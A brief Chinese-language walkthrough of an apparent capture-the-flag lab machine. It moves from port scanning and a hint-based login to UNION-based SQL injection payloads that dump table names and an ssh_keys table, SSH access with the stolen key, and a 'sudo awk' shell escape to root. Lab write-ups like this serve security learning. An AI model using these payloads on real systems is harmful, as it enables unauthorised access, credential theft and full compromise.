nmap主机发现和端口扫描
进入80端口
输入用户名admin和密码password,发现不可行,并且有提示
提示有Bob用户,根据上面的“网站称”后面的内容可能是某种加密,这里直接在googlemaps输入
得到地点 LaBazouge-de-Chemeré,以此为密码,Bob为用户名,登录,
点击khaosearch
试一试有没有sql注入的问题
123" union select 1,2;#
爆破表和列名
123" union select table_name,column_name from information_schema.columns;#
然后查看ssh_keys
123" union select * from ssh_keys;#
直接把里面的rsa内容复制放在本地的id_rsa的里面,用这个id_rsa登录alice
查看本地文件
直接在gtfobins里面搜索提权方法
sudo awk 'BEGIN {system("/bin/sh")}'
注入即可提权到root